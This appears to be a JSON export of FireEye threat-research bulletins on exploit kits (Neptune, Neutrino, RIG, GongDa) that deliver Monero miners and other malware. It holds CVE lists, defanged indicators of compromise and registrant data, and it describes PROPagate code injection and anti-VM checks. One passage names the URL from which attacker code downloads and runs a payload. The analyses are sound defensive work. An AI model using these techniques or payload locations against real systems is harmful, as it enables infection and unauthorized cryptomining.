"NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-22T14:00:00", "type": "fireeye", "title": "Hiking Club Malvertisements Drop Monero Miners Via Neptune Exploit Kit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332", "CVE-2015-2419", "CVE-2015-7645", "CVE-2015-8651", "CVE-2016-0189"], "modified": "2017-08-22T14:00:00", "id": "FIREEYE:2B54485AD5D7B8DCC55F5A6BE1F3DBD6", "href": "https://www.fireeye.com/blog/threat-research/2017/08/neptune-exploit-kit-malvertising.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-08-31T00:18:22", "description": "Exploit kit (EK) activity has been on the decline ever since [Angler Exploit Kit was shut down](<https://securityintelligence.com/news/say-goodbye-to-the-angler-exploit-kit/>) in 2016. [Fewer people using Internet Explorer](<https://threatpost.com/exploit-kit-activity-quiets-but-is-far-from-silent/124461/>) and a [drop in browser support for Adobe Flash](<https://blog.mozilla.org/futurereleases/2016/07/20/reducing-adobe-flash-usage-in-firefox/>) \u2013 two primary targets of many exploit kits \u2013 have also contributed to this decline. Additionally, some popular redirect campaigns using [PseudoDarkleech and EITest Gate to Rig Exploit Kit](<http://www.darkreading.com/attacks-breaches/rig-exploit-kit-takedown-sheds-light-on-domain-shadowing/d/d-id/1329085>) were shut down in the first half of this year.\n\nDespite all this, [malvertising campaigns involving exploit kits](<https://www.fireeye.com/blog/threat-research/2017/03/still_getting_served.html>) remain active. The Neptune Exploit Kit (or Terror EK), which initially started as a Sundown EK copycat operation, has relied heavily on malvertisements. Early use of this exploit kit saw domains with very similar patterns dropping cryptocurrency miners through malvertisements:\n\n * networkmarketingpro3[.]us\n * networkmarketingpro2[.]us\n * onlinesalesproaffiliate1[.]us\n * onlinesalesproaffiliate2[.]us\n * onlinesalesproaffiliate3[.]us\n * onlinesalesproaffiliate4[.]us\n * onlinesalesproaffiliate5[.]us\n * onlinesalesproaffiliate6[.]us\n\nPayloads spread by Neptune Exploit Kit have since diversified. 
Recently, we have seen changes in Neptune EK\u2019s URI patterns, landing pages, malvertisement campaigns and login account details associated with the cryptocurrency mining payloads. \n\n#### Propagation\n\nSince July 16, our Dynamic Threat Intelligence (DTI) has observed changes in URI patterns for Neptune Exploit Kit. At the time of writing, the new campaign abuses a legitimate popup ad service (within Alexa\u2019s top 100) with redirects to ads about hiking clubs, as shown in Figure 1.\n\n \nFigure 1: Fake ad for a hiking club leading to Neptune EK\n\nRedirects from domains associated with these ads eventually use 302 redirects to move victims to exploit kit landing pages. Fake domains involved in these redirects imitate real domains. For example, highspirittreks[.]club shown in Figure 1 spoofs highspirittreks[.]com. Other hiking fake ads use similarly spoofed legitimate site names with .club domains. Figure 2 shows a redirect from a fake site\u2019s pop-up.\n\n \nFigure 2: Silent redirect to EK landing page\n\nFireEye Dynamic Threat Intelligence (DTI) stats show the regions being affected by this campaign (Figure 3). \n\n \nFigure 3: Regions affected by the malvertisement campaign, as observed from customer data\n\nA few instances of the redirect involve flvto[.]download (mimicking the legitimate www.flvto[.]biz) instead of hiking club fake ads. Figure 4 and Figure 5 show the legitimate domain and fake domain, respectively, for comparison\u2019s sake.\n\n \nFigure 4: Real page, flvto[.]biz (Alexa rank 2,674)\n\n \nFigure 5: Fake page, flvto[.]download\n\nMost of the ads linked to this campaign have been observed on high-traffic torrent and multimedia hosting sites.\n\nSites are hosted on IP **95.85.62.226**. Reverse lookup for this IP shows:\n\n * 2watchmygf[.]stream\n * flvto[.]download\n * highspirittreks[.]club\n * treknepal[.]club\n\nOther hosted IPs and domains of the same campaign are in the Indicators of Compromise section at the end of the post. 
All IPs point to locations in Amsterdam.\n\nSince July 16, related EK infrastructure has been hosted on domains protected by Whois Guard. However, in recent activity, domains are linked to the Registrant email: \u2018gabendollar399@gmx[.]com\u2019. \n\nThe following domains are currently associated with this email:\n\n| **Domain Name** | **Create Date** | **Registrar** |\n|---|---|---|\n| [itsmebecauseyoua[.]pw](<https://whois.domaintools.com/itsmebecauseyoua.pw>) | 2017-03-05 | -- |\n| [loansforevery[.]us](<https://whois.domaintools.com/loansforevery.us>) | 2017-04-14 | 1 HOST RUSSIA, INC |\n| [managetheworld[.]us](<https://whois.domaintools.com/managetheworld.us>) | 2017-04-14 | 1 HOST RUSSIA, INC |\n| [nudecams[.]us](<https://whois.domaintools.com/nudecams.us>) | 2017-04-14 | 1 HOST RUSSIA, INC |\n\n#### Exploits/Landing Page\n\nThe landing page for the Neptune Exploit Kit redirects to further HTML and Adobe Flash exploit links after it checks the Flash versions installed on the victim\u2019s machine (see Figure 6).\n\n \nFigure 6: Landing page of Neptune EK\n\nThis EK exploits multiple vulnerabilities in one run. 
Most of these exploits are well-known and commonly seen in other exploit kits.\n\nCurrently, Neptune EK uses three Internet Explorer exploits and two Flash exploits:\n\n * [CVE-2016-0189](<https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html>) \u2013 Internet Explorer\n * [CVE-2015-2419](<https://www.fireeye.com/blog/threat-research/2015/08/cve-2015-2419_inte.html>) \u2013 Internet Explorer\n * [CVE-2014-6332](<https://technet.microsoft.com/en-us/library/security/ms14-064.aspx>) \u2013 Internet Explorer\n * [CVE-2015-8651](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8651>) \u2013 Adobe Flash Player\n * [CVE-2015-7645](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7645>) \u2013 Adobe Flash Player\n\n#### Payload (Monero miner)\n\nThe payload is dropped as a plain executable from one of the URIs belonging to the EK domain (same as the landing page). Figure 7 shows a typical response header for these cases.\n\n \nFigure 7: Response header for Monero miner payload\n\nPost-infection traffic shows an attempt to connect to minergate[.]com (Figure 8) and a login attempt using the cpu-miner service via the login email monsterkill20@mail[.]com (Figure 9). Login attempts are invoked via the command line:\n\n\n\n \nFigure 8: DNS query to minergate[.]com\n\n \nFigure 9: Login attempt\n\n#### Conclusion\n\nDespite an observable decline in exploit kit activity, users are still at risk, especially if they have outdated or unpatched software. This threat is especially dangerous considering drive-by exploit kits (such as Neptune EK) can use malvertisements to seamlessly download payloads without ever alerting the user.\n\nFireEye NX [detects exploit kit infection attempts](<https://www.fireeye.com/products/nx-network-security-products.html>) before the malware payload is downloaded to the user\u2019s machine. 
Additionally, malware payloads dropped by exploit kits are detected in all other FireEye products.\n\n#### Indicators of Compromise\n\n##### Malvertisement domains:\n\n * hxxp://treknepal[.]club/\n * hxxp://highspirittrecks[.]club\n * hxxp://advnepaltrekking[.]club\n * hxxp://nepalyogatrek[.]club\n * hxxp://flvto[.]download\n\n##### Malvertisement IPs:\n\n * 95.85.62.226\n * 185.82.202.36\n\n##### EK domains (currently active) registrant:\n\nDomain Name: MANAGETHEWORLD.US \nDomain ID: D59392852-US \nSponsoring Registrar: NAMECHEAP, INC. \nSponsoring Registrar IANA ID: 1068 \nRegistrar URL (registration services): http://www.namecheap[.]com \nDomain Status: clientTransferProhibited \nRegistrant ID: NLGUS4BVD3M2DN2Y \nRegistrant Name: kreb son \nRegistrant Address1: Maker 541 \nRegistrant City: Navada \nRegistrant State/Province: SA \nRegistrant Postal Code: 546451 \nRegistrant Country: Bulgaria \nRegistrant Country Code: BG \nRegistrant Phone Number: +44.45623417852 \nRegistrant Email: gabendollar399@gmx[.]com \nRegistrant Application Purpose: P1 \nRegistrant Nexus Category: C11 \nAdministrative Contact ID: VNM50NNJ5Y0VNLDY \nAdministrative Contact Name: kreb son \nAdministrative Contact Address1: Maker 541 \nAdministrative Contact City: Navada \nAdministrative Contact State/Province: SA \nAdministrative Contact Postal Code: 546451 \nAdministrative Contact Country: Bulgaria \nAdministrative Contact Country Code: BG \nAdministrative Contact Phone Number: +44.45623417852 \nAdministrative Contact Email: gabendollar399@gmx[.]com\n\n##### Sample EK URI Pattern:\n\nforum_jVpbUAr/showthread.php?id=xxxxxxx\n\n##### Sample MD5s:\n\nb678ac0b870b78060a2a9f599000302d \n5a18c92e148bbd7f10077f8e7431326e\n\n#### Acknowledgement\n\nWe would like to thank Hassan Faizan for his contributions to this discovery.\n", "edition": 2, "cvss3": {}, "published": "2017-08-22T10:00:00", "type": "fireeye", "title": "Hiking Club Malvertisements Drop Monero Miners Via Neptune Exploit Kit", 
"bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332", "CVE-2016-0189", "CVE-2015-8651", "CVE-2015-2419", "CVE-2015-7645"], "modified": "2017-08-22T10:00:00", "id": "FIREEYE:D549372E644DEECBB7AEE8031D35DA4D", "href": "https://www.fireeye.com/blog/threat-research/2017/08/neptune-exploit-kit-malvertising.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-11-04T00:25:29", "description": "A security researcher recently published [source code](<https://github.com/theori-io/cve-2016-0189>) for a working exploit for CVE-2016-0189 and the Neutrino Exploit Kit (EK) quickly adopted it.\n\nCVE-2016-0189 was originally exploited as a zero-day vulnerability in [targeted attacks in Asia](<http://www.symantec.com/connect/blogs/internet-explorer-zero-day-exploit-used-targeted-attacks-south-korea>). The vulnerability resides within scripting engines in Microsoft\u2019s Internet Explorer (IE) browser, and is exploited to achieve Remote Code Execution (RCE). According to the researcher\u2019s repository, the open source exploit affects IE on at least Windows 10. It is possible that attackers could use or repurpose the attack for earlier versions of Windows.\n\nMicrosoft patched [CVE-2016-0189 in May on Patch Tuesday](<https://technet.microsoft.com/en-us/library/security/ms16-may.aspx>). 
Applying this patch will protect a system from this exploit.\n\n##### Attack Details \n\n\nThe popular Neutrino EK was quick to adopt this exploit. Neutrino works by embedding multiple exploits into one Shockwave Flash (SWF) file. Once run, the SWF profiles the victim\u2019s system \u2013 shown in Figure 1 \u2013 to determine which of its embedded exploits to use.\n\n\n\nFigure 1. Neutrino EK SWF profiles a victim\n\nNext, it decrypts and runs the applicable exploit, as shown in Figure 2. This is different from most other EKs, in which an earlier HTML/JavaScript stage profiles the browser and selectively downloads exploits from the server.\n\n\n\nFigure 2. Decrypt and embed the selected exploit into an iframe\n\nIn this example, Neutrino embedded exploits for five vulnerabilities that have been patched since May or earlier: three for Adobe Flash Player (CVE-2016-4117, CVE-2016-1019, CVE-2015-8651) and two for Internet Explorer (CVE-2016-0189, CVE-2014-6332). CVE-2016-0189 is the newest addition to Neutrino\u2019s arsenal.\n\n##### CVE-2016-0189\n\nThis CVE-2016-0189 vulnerability stems from a failure to put a lock on an array before working on it. This omission can lead to an issue when the array is changed while another function is in the middle of working on it. Memory corruption can occur if the \u201cvalueOf\u201d property of the array is set to a script function that changes the array size, as shown in Figure 3.\n\n\n\nFigure 3. Neutrino setting triggering conditions\n\nAfter Microsoft released the patch, a security researcher compared the original and patched programs to identify the root cause of the vulnerability and create a fully functioning exploit. 
The exploit embedded within Neutrino is identical to this researcher\u2019s exploit, except for the code that runs after initial control.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-14T20:37:00", "type": "fireeye", "title": "Exploit Kits Quickly Adopt Exploit Thanks to Open Source Release", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332", "CVE-2015-8651", "CVE-2016-0189", "CVE-2016-1019", "CVE-2016-4117"], "modified": "2016-07-14T20:37:00", "id": "FIREEYE:FAB9D3AA433B8323FF6FA7ABC6AD4069", "href": "https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T16:34:44", "description": "#### Introduction\n\nThrough FireEye Dynamic Threat Intelligence (DTI), we observed RIG Exploit Kit (EK) delivering a dropper that leverages the [PROPagate injection technique](<http://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/>) to inject code that downloads and executes a Monero miner (similar activity has been reported by [Trend Micro](<https://blog.trendmicro.com/trendlabs-security-intelligence/rig-exploit-kit-now-using-cve-2018-8174-to-deliver-monero-miner/>)). Apart from leveraging a relatively lesser known injection technique, the attack chain has some other interesting properties that we will touch on in this blog post.\n\n#### Attack Chain\n\nThe attack chain starts when the user visits a compromised website that loads the RIG EK landing page in an iframe. The RIG EK uses various techniques to deliver the NSIS (Nullsoft Scriptable Install System) loader, which leverages the PROPagate injection technique to inject shellcode into explorer.exe. This shellcode executes the next payload, which downloads and executes the Monero miner. The flow chart for the attack chain is shown in Figure 1.\n\n \nFigure 1: Attack chain flow chart\n\n#### Exploit Kit Analysis\n\nWhen the user visits a compromised site that is injected with an iframe, the iframe loads the landing page. The iframe injected into a compromised website is shown in Figure 2.\n\n \nFigure 2: Injected iframe\n\nThe landing page contains three different JavaScript snippets, each of which uses a different technique to deliver the payload. 
None of these techniques are new, so we will only give a brief overview of each one in this post.\n\n#### JavaScript 1\n\nThe first JavaScript has a function, fa, which returns a VBScript that will be executed using the execScript function, as shown by the code in Figure 3.\n\n \nFigure 3: JavaScript 1 code snippet\n\nThe VBScript exploits [CVE-2016-0189](<https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html>) which allows it to download the payload and execute it using the code snippet seen in Figure 4.\n\n \nFigure 4: VBScript code snippet\n\n#### JavaScript 2\n\nThe second JavaScript contains a function that will retrieve additional JavaScript code and append this script code to the HTML page using the code snippet seen in Figure 5.\n\n \nFigure 5: JavaScript 2 code snippet\n\nThis newly appended JavaScript exploits [CVE-2015-2419](<https://www.fireeye.com/blog/threat-research/2015/08/cve-2015-2419_inte.html>) which utilizes a vulnerability in JSON.stringify. This script obfuscates the call to JSON.stringify by storing pieces of the exploit in the variables shown in Figure 6.\n\n \nFigure 6: Obfuscation using variables\n\nUsing these variables, the JavaScript calls JSON.stringify with malformed parameters in order to trigger CVE-2015-2419 which in turn will cause native code execution, as shown in Figure 7.\n\n \nFigure 7: Call to JSON.Stringify\n\n#### JavaScript 3\n\nThe third JavaScript has code that adds additional JavaScript, similar to the second JavaScript. 
This additional JavaScript adds a flash object that exploits [CVE-2018-4878](<https://www.fireeye.com/blog/threat-research/2018/02/attacks-leveraging-adobe-zero-day.html>), as shown in Figure 8.\n\n \nFigure 8: JavaScript 3 code snippet\n\nOnce the exploitation is successful, the shellcode invokes a command line to create a JavaScript file with filename u32.tmp, as shown in Figure 9.\n\n \nFigure 9: WScript command line\n\nThis JavaScript file is launched using WScript, which downloads the next-stage payload and executes it using the command line in Figure 10.\n\n \nFigure 10: Malicious command line\n\n#### Payload Analysis\n\nFor this attack, the actor has used multiple payloads and anti-analysis techniques to bypass the analysis environment. Figure 11 shows the complete malware activity flow chart.\n\n \nFigure 11: Malware activity flow chart\n\n#### Analysis of NSIS Loader (SmokeLoader)\n\nThe first payload dropped by the RIG EK is a compiled NSIS executable famously known as SmokeLoader. Apart from NSIS files, the payload has two components: a DLL, and a data file (named \u2018kumar.dll\u2019 and \u2018abaram.dat\u2019 in our analysis case). The DLL has an export function that is invoked by the NSIS executable. This export function has code to read and decrypt the data file, which yields the second stage payload (a portable executable file).\n\nThe DLL then spawns itself (dropper) in SUSPENDED_MODE and injects the decrypted PE using process hollowing.\n\n#### Analysis of Injected Code (Second Stage Payload)\n\nThe second stage payload is a highly obfuscated executable. It consists of a routine that decrypts a chunk of code, executes it, and re-encrypts it.\n\nAt the entry point, the executable contains code that checks the OS major version, which it extracts from the Process Environment Block (PEB). If the OS version value is less than 6 (prior to Windows Vista), the executable terminates itself. 
It also contains code that checks whether the executable is being debugged, which it extracts from offset 0x2 of the PEB. If the _BeingDebugged_ flag is set, the executable terminates itself.\n\nThe malware also implements an Anti-VM check by opening the registry key **HKLM\\SYSTEM\\ControlSet001\\Services\\Disk\\Enum** with value 0.\n\nIt checks whether the registry value data contains any of the strings: vmware, virtual, qemu, or xen. Each of these strings is indicative of virtual machines.\n\nAfter running the anti-analysis and environment check, the malware starts executing the core code to perform the malicious activity.\n\nThe malware uses the [PROPagate injection method](<http://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/>) to inject and execute the code in a targeted process. The PROPagate method is similar to the SetWindowLong injection technique. In this method, the malware uses the SetPropA function to modify the callback for UxSubclassInfo and cause the remote process to execute the malicious code.\n\nThis code injection technique only works for a process with lesser or equal integrity level. The malware first checks whether the integrity of the current running process is medium integrity level (2000, SECURITY_MANDATORY_MEDIUM_RID). Figure 12 shows the code snippet.\n\n \nFigure 12: Checking integrity level of current process\n\nIf the process is higher than medium integrity level, then the malware proceeds further. If the process is lower than medium integrity level, the malware respawns itself with medium integrity.\n\nThe malware creates a file mapping object and writes the dropper file path to it and the same mapping object is accessed by injected code, to read the dropper file path and delete the dropper file. 
The name of the mapping object is derived from the volume serial number of the system drive and an XOR operation with the hardcoded value (Figure 13).\n\n_File Mapping Object Name = \u201cVolume Serial Number\u201d + \u201cVolume Serial Number\u201d XOR 0x7E766791_\n\n \nFigure 13: Creating file mapping object name\n\nThe malware then decrypts the third stage payload using XOR and decompresses it with RTLDecompressBuffer. The third stage payload is also a PE executable, but the author has modified the header of the file to avoid it being detected as a PE file in memory scanning. After modifying several header fields at the start of decrypted data, we can get the proper executable header (Figure 14).\n\n \nFigure 14: Injected executable without header (left), and with header (right)\n\nAfter decrypting the payload, the malware targets the shell process, explorer.exe, for malicious code injection. It uses GetShellWindow and GetWindowThreadProcessId APIs to get the shell window\u2019s thread ID (Figure 15).\n\n \nFigure 15: Getting shell window thread ID\n\nThe malware injects and maps the decrypted PE in a remote process (explorer.exe). It also injects shellcode that is configured as a callback function in SetPropA.\n\nAfter injecting the payload into the target process, it uses EnumChild and EnumProps functions to enumerate all entries in the property list of the shell window and compares each with UxSubclassInfo.\n\nAfter finding the UxSubclassInfo property of the shell window, it saves the handle info and uses it to set the callback function through SetPropA.\n\nSetPropA has three arguments, the third of which is data. The callback procedure address is stored at the offset 0x14 from the beginning of data. 
Malware modifies the callback address with the injected shellcode address (Figure 16).\n\n \nFigure 16: Modifying callback function\n\nThe malware then sends a specific message to the window to execute the callback procedure corresponding to the UxSubclassInfo property, which leads to the execution of the shellcode.\n\nThe shellcode contains code to execute the address of the entry point of the injected third stage payload using CreateThread. It then resets the callback for SetPropA, which was modified by malware during PROPagate injection. Figure 17 shows the code snippet of the injected shellcode.\n\n \nFigure 17: Assembly view of injected shellcode\n\n#### Analysis of Third Stage Payload\n\nBefore executing the malicious code, the malware performs anti-analysis checks to make sure no analysis tool is running in the system. It creates two infinitely running threads that contain code to implement anti-analysis checks.\n\nThe first thread enumerates the processes using CreateToolhelp32Snapshot and checks for the process names generally used in analysis. It generates a DWORD hash value from the process name using a custom operation and compares it with the array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the corresponding process.\n\nThe second thread enumerates the windows using EnumWindows. It uses GetClassNameA function to extract the class name associated with the corresponding window. Like the first thread, it generates a DWORD hash value from the class name using a custom operation and compares it with the array of hardcoded DWORD values. 
If the generated value matches any value in the array, it terminates the process related to the corresponding window.\n\nOther than these two anti-analysis techniques, it also has code to check internet connectivity by trying to reach the URL: www.msftncsi[.]com/ncsi.txt.\n\nTo remain persistent in the system, the malware installs a scheduled task and a shortcut file in the %startup% folder. The scheduled task is named \u201cOpera Scheduled Autoupdate {Decimal Value of GetTickCount()}\u201d.\n\nThe malware then communicates with the malicious URL to download the final payload, which is a Monero miner. It creates an MD5 hash value using Microsoft CryptoAPIs from the computer name and the volume information and sends the hash to the server in a POST request. Figure 18 shows the network communication.\n\n \nFigure 18: Network communication\n\nThe malware then downloads the final payload, the Monero miner, from the server and installs it in the system.\n\n#### Conclusion\n\nAlthough we have been observing a decline in Exploit Kit activity, attackers are not abandoning them altogether. In this blog post, we explored how RIG EK is being used with various exploits to compromise endpoints. 
We have also shown how the NSIS Loader leverages the lesser known PROPagate process injection technique, possibly in an attempt to evade security products.\n\nFireEye MVX and the FireEye Endpoint Security (HX) platform detect this attack at several stages of the attack chain.\n\n#### Acknowledgement\n\nWe would like to thank Sudeep Singh and Alex Berry for their contributions to this blog post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-28T16:00:00", "type": "fireeye", "title": "RIG Exploit Kit Delivering Monero Miner Via PROPagate Injection Technique", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2419", "CVE-2016-0189", "CVE-2018-4878", "CVE-2018-8174"], "modified": "2018-06-28T16:00:00", "id": "FIREEYE:D9B02C48E42AD3B4134C515CEB7E23C8", "href": "https://www.fireeye.com/blog/threat-research/2018/06/rig-ek-delivering-monero-miner-via-propagate-injection-technique.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-04T00:25:54", "description": "On Jan. 27, we observed visitors to a Korean news site being redirected to the GongDa Exploit Kit (EK), potentially exposing them to malware infection. We will be referring to this site as KNS.\n\nGongDa is an exploit kit that can compromise vulnerable endpoints by use of exploits, allowing harmful malware to be installed on the system. 
While GongDa is an older exploit kit that continues to use Java exploits, it has also been found delivering Flash and VBScript exploits. Despite its shortcomings when compared to newer EKs such as Angler or Neutrino, GongDa proves that old tricks (or vulnerabilities) can still work effectively.\n\n##### **ATTACK CHAIN**\n\nThe attack chain is no different from previous GongDa attacks we\u2019ve seen. A compromised page on the site loads a .js file that redirects to the EK\u2019s landing page.\n\nFigure 1: GongDa EK attack chain\n\nThe initial page is the first highlighted request shown in Figure 1. The second request is the .js file jquery-1.3.2.min.js. It has script code injected at the bottom that loads an iframe to **sekielec[.]co[.]kr/m/et/ad.html**, the EK\u2019s landing page, as shown in Figure 2.\n\nFigure 2: Injected script in the .js leading to GongDa\n\nWe observed a number of KNS-owned pages loading the malicious .js that redirects to the GongDa landing page \u201c/ad.html\u201d.\n\nFrom here, \u201cad.html\u201d loaded:\n\n * sekielec[.]co[.]kr/m/et/swfobject.js\n * sekielec[.]co[.]kr/m/et/PnNxKk.html\n * sekielec[.]co[.]kr/m/et/jquery.js\n\n##### **EXPLOITS**\n\nGongDa has been observed serving exploits for the following CVEs in recent attacks:\n\nCVE-2011-3544, CVE-2011-2140, CVE-2012-0507, CVE-2012-1723, CVE-2012-1889, CVE-2012-4681, CVE-2012-5076, CVE-2013-0422, CVE-2013-0634 and CVE-2014-6332.\n\nIn this particular attack, the landing page probes the target machine and selects an exploit page to deliver to the victim. The exploit page observed in this attack was **sekielec[.]co[.]kr/m/et/PnNxKk.html**. It attempts to trigger CVE-2014-6332, \u201cWindows OLE Automation Array Remote Code Execution Vulnerability\u201d. This vulnerability was patched by Microsoft Security Bulletin [MS14-064](<https://technet.microsoft.com/library/security/ms14-064>) in November 2014. 
It is a commonly used and dangerous vulnerability that can give an attacker arbitrary command execution on a target system.\n\nThe exploit page begins by reversing a string of script code used to start the exploitation process.\n\nFigure 3 shows the string as it appears on the page, before reversal:\n\nFigure 3: Reversed initiation code\n\nFigure 4 shows the same code after reversal:\n\nFigure 4: Initiation code\n\nA call to the _Create()_ function leads to a call to the trigger function _Over()_, which is shown in Figure 5.\n\nFigure 5: Trigger function _Over()_\n\nThe _Over()_ function is responsible for setting up the conditions and corrupting an OLE Automation array object, thus triggering the vulnerability.\n\nOnce the vulnerability is triggered, the attacker code can execute commands on the system.\n\nThree variables are assigned, as shown in Figure 6.\n\nFigure 6: Command variables\n\nThe first variable (_nburl_) is a URL to the attacker\u2019s malware. The second variable (_nbExE_) is a randomly generated name for the malware that is placed on the system. 
The third variable (_nbnurl_) is simply the first variable enclosed in quotes.\n\n_nburl: http://smsforu[.]co[.]kr/RAD/stat/at.exe_\n\nFinally, the attacker code uses these variables and executes the following commands, as shown in Figure 7.\n\nFigure 7: Command beginning\n\nThe _nbnurl_ and _nbExE_ variables are used in the execution of the commands shown in Figure 8.\n\nFigure 8: Command ending\n\nThe malicious file is placed in the \u201c%SystemRoot%\\system\\\u201d directory, using the _nbExE_ variable described above as the filename.\n\n##### **PAYLOADS**\n\nDuring this GongDa attack we saw the payloads being served from a domain within Korea:\n\n**smsforu[.]co[.]kr**\n\nwith the following filename:\n\n**/rad/stat/at.exe**\n\nIn recent GongDa attacks, we\u2019ve observed payloads such as backdoors, RATs, Trojans, and downloaders.\n\nSome of the MD5s observed include the following:\n\n * aac178f775588ca1d42c00d4d95604bd\n * 3d58f4b2008f6d87cab9166c09e513b5\n * a18d1bce5618b23f592dae9133c25229\n * 40be7c9424c6c6de0d560d358a020a5c\n * 808e27fd120ade3ecfb2b21aeda8bc58\n * ed751ce651d685100e00ed133e4e5018\n\n##### **ADDITIONAL INFO**\n\nAttacks involving the GongDa Exploit Kit are not new and are fairly common in the APAC region. While it\u2019s not the most cutting-edge EK in the wild, it is still effective because many systems in the region seem to remain unpatched and defenseless against antiquated vulnerabilities such as those used by GongDa.\n\nAdditionally, GongDa consistently leverages infrastructure hosted on one of China\u2019s largest ISPs, China Telecom, operator of AS4134. China Telecom hosts the domain 51yes[.]com, a web traffic statistics service.\n\nOne of GongDa\u2019s telltale behaviors is the use of stat counters, presumably for tracking the EK\u2019s traffic and infection statistics. In this case they almost always come from count_X_[.]51yes[.]com, based out of China. 
Figure 9 shows the GET requests for these stat counters.\n\nFigure 9: Stat counter request\n\nFireEye\u2019s Dynamic Threat Intelligence shows that count7[.]51yes[.]com has been used in multiple GongDa EK attacks in January 2016 alone.\n\n| Referring GongDa URL |\n| --- |\n| bose[.]co[.]kr/shop/img/click/ad1.html |\n| bose[.]co[.]kr/shop/img/click/as1.html |\n| bose[.]co[.]kr/shop/img/naver/ad.html |\n| edresearch[.]co[.]kr/PEG/click/ad.html |\n| edresearch[.]co[.]kr/PEG/click1/ad.html |\n| nstory[.]com/tmp/click/ad1.html |\n| nstory[.]com/vars/ad/ad1.html |\n| nstory[.]com/vars/cache/click/ad1.html |\n| odbike[.]co[.]kr/w3c/cdn/ad1.html |\n| odbike[.]co[.]kr/shop/skin/click/ad1.html |\n| odbike[.]co[.]kr/shop/temp/click/ad1.html |\n| poption[.]kr/gnu/cdn1/ad.html |\n| poption[.]kr/gnu/click/ad.html |\n| poption[.]kr/gnu/extend/ad/ad.html |\n| poption[.]kr/w3c/click/ad.html |\n| sekielec[.]co[.]kr/m/et/ad.html |\n| smsmaster[.]co[.]kr/docs/click1/ad.html |\n| smsmaster[.]co[.]kr/docs/click3/ad.html |\n| www[.]poption[.]kr/gnu/js/click/ad.html |\n\nChecking other count_X_[.]51yes[.]com hits with GongDa referrers, we saw hundreds of domains affected by GongDa EK activity.\n\nIt is believed that the GongDa Exploit Kit has Chinese origins. The hypothesis is derived from its capabilities, usage, and the infrastructure used to target various APAC region entities.\n\nInterestingly, the 